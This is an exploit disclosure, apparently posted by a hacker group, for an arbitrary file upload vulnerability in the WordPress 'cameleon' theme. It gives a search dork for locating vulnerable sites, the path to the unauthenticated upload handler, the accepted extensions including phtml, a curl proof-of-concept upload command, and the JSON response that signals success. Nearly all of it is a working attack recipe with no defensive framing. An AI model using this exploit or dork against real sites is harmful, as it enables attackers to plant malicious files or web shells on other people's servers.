Wordpress theme cameleon arbitrary file upload Tested on : Ubuntu 18.04 Software download : https://id.wordpress.org/themes/the-chameleon/ Dork : inurl:/wp-content/themes/cameleon Exploit : /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php Upload Extension : phtml,html,txt,jpg,png Upload Location : /wp-content/uploads/[year]/[month]/yourfile.html POC : curl -v -F "qqfile=@yourfile.html" http://vuln.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php Response if exploitation success : {"success":true,"url":"http:\/\/vuln.com\/wp-content\/uploads\/[year]\/[month]\/file.html","path":"\/home\/user\/public_html\/wp-content\/uploads\/[year]\/[month]\/"} Greets: Allah,ProblemCyberTeam,All my friends